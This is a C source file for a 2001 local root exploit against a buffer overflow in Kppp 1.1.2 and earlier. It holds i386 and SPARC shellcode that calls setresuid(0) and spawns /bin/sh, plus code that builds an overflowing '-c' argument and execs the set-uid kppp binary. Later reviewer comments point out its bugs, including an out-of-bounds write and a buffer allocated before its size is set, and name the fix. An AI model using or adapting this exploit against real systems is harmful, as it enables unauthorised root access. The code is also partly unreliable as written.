/*
 * exploit.c Linux/Intel Kppp 1.1.2 and below
 * Re-Copyright (C) 2001 Doom <doom@sekurity.net>
 * <smashstack@hushmail.com)
 *
 * Null Byte Security <http://nbs.extremenetworking.net>
 * Bugtraq ID :
 * Credit : TDP, Michel Kaempf, RaiSe
 * Tested : x86 Redhat 6.2
 * Notes : This may need a little tweaking, hehe ;)
 *
 * Description: There exists a buffer overflow in Kppp
 * probably because of a strcpy call. Also, I feel it's
 * safe to release this exploit now, but some distros
 * are still including 1.1.2 in their source.
 *
 * Greets: Bi0cide, Natas, BrainStorm, Xchgleip, Z,
 * Fuqrag, Piffy, Bios Disk, B0ob, Qitest1, Mixter,
 * Ghost Blood, K2, Ontogenesis, Char, Mud, Medium,
 * Hackers Lab, Electronic Souls, Packet Storm, Security
 * Focus, #!ElectronicSouls, sekurity.net, and everyone else.
 */

/*
 * Reviewer notes on the structure of this file (as written, 2001-era code):
 *  - Only <stdio.h> and <stdlib.h> are included. strlen() and execle() are
 *    called below without a prototype, so they are implicitly declared
 *    (an error in C99 and later; <string.h> and <unistd.h> are the usual
 *    headers for them).
 *  - The overflowing value is delivered as the "-c" command-line argument of
 *    a hard-coded kppp path, which matches the header's description of an
 *    unchecked strcpy in the target. The defensive fix on the target side is
 *    length-checking that argument; on the deployment side, not installing
 *    an affected version set-uid.
 */
#include <stdio.h>
#include <stdlib.h>

/* Default length of the argument buffer (bytes) and default stack offset;
 * both can be overridden from argv in main(). */
#define BUFFER 247
#define OFFSET 1

#if defined(__i386__) && defined(__linux__)
/* Architecture-specific payload bytes; the i386 variant is annotated in the
 * commented-out assembly listing after get_sp(). */
char shellcode[] =
    "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
    "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

/*
 * Returns the caller's stack pointer.
 *
 * There is no C return statement: the inline asm copies %esp into %eax and
 * the function relies on %eax being the i386 return register. Compilers may
 * warn that control reaches the end of a non-void function; the result is
 * only meaningful when no optimization rewrites the epilogue.
 */
unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

/*
 * small setresuid 0,0,0 execve() of /bin/sh (without exit())
 *
 * __asm__("
 *     subl %ebx, %ebx
 *     subl %ecx, %ecx
 *     subl %edx, %edx
 *     movb $0xa4, %al
 *     int $0x80
 *     xorl %edx,%edx
 *     pushl %edx
 *     pushl $0x68732f6e
 *     pushl $0x69622f2f
 *     movl %esp,%ebx
 *     pushl %edx
 *     pushl %ebx
 *     movl %esp,%ecx
 *     leal 0xb(%edx),%eax
 *     int $0x80
 * ");
 */
#elif defined(__sparc__) && defined(__linux__)
/* SPARC/Linux variant of the payload; no annotated listing is given for it. */
char shellcode[] =
    "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10"
    "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10"
    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
    "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
    "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x10";

/*
 * SPARC version of get_sp(): moves %sp into %i0 (the return register in the
 * SPARC calling convention) via inline asm, again without a C return.
 */
unsigned long get_sp(void)
{
    __asm__("or %sp, %sp, %i0");
}
#endif
/* On any other platform neither shellcode nor get_sp() is defined and main()
 * will not compile; there is no #else fallback. */

/*
 * Builds one command-line argument of bsize bytes and execs the hard-coded
 * kppp binary with it as the "-c" argument.
 *
 * argv[1] (optional): buffer size, parsed with atoi().
 * argv[2] (optional): offset subtracted from the stack pointer, atoi().
 *
 * Layout of the argument: every 4-byte slot holds the guessed address, with
 * shellcode copied over the middle of the buffer; the last byte is set to
 * '\0' so the argument is a C string. Only returns if execle() fails.
 */
int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = OFFSET, bsize = BUFFER;
    int i;

    /* Allocated with the compile-time BUFFER size; bsize is re-read from
     * argv[1] further down, after this allocation. Note the failure path
     * exits with status 0 (success). */
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    printf("\nLocal Linux Kppp Exploit by Doom\n");
    printf("Use:$ ./kppp <buffersize> <offset>\n");

    /* Guessed target address: the current stack pointer minus the offset. */
    addr = get_sp() - offset;
    /* addr is a long but printed with %x (expects unsigned int); fine only
     * where long is 32 bits, e.g. the x86 system named in the header. */
    printf("\nReturn Address : 0x%x", addr);

    /* atoi() gives no error reporting; non-numeric input becomes 0. */
    if (argc > 1)
        bsize = atoi(argv[1]);
    if (argc > 2)
        offset = atoi(argv[2]);

    printf("\nBuffer Size : %d\n", bsize);
    printf("Offset : %d\n", offset);

    ptr = buff;
    addr_ptr = (long *) ptr;   /* assigned but never used afterwards */

    /* Place the payload starting at the middle of the buffer.
     * i is int while strlen() returns size_t: signed/unsigned comparison. */
    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* Fill the whole buffer with addr, 4 bytes per slot, overwriting part
     * of the payload copied above. The byte order written is bits 16-23,
     * 24-31, 0-7, 8-15, i.e. not the plain little-endian layout of the
     * value; presumably a deliberate permutation for the target's handling
     * of the argument ("may need a little tweaking" in the header).
     * The loop writes buff[i+3] for the last slot even when bsize is not a
     * multiple of 4, which runs past the allocation. */
    for (i = 0; i < bsize; i += 4) {
        buff[i]     = (addr & 0x00ff0000) >> 16;
        buff[i + 1] = (addr & 0xff000000) >> 24;
        buff[i + 2] = addr & 0x000000ff;
        buff[i + 3] = (addr & 0x0000ff00) >> 8;
    }
    /* Terminate so execle() passes a valid C string as the argument. */
    buff[bsize - 1] = '\0';

    /* The trailing 0 ends the argv list. execle() additionally expects an
     * envp pointer after the NULL terminator, which is not passed here. */
    execle("/usr/local/kde/bin/kppp", "kppp", "-c", buff, 0);
}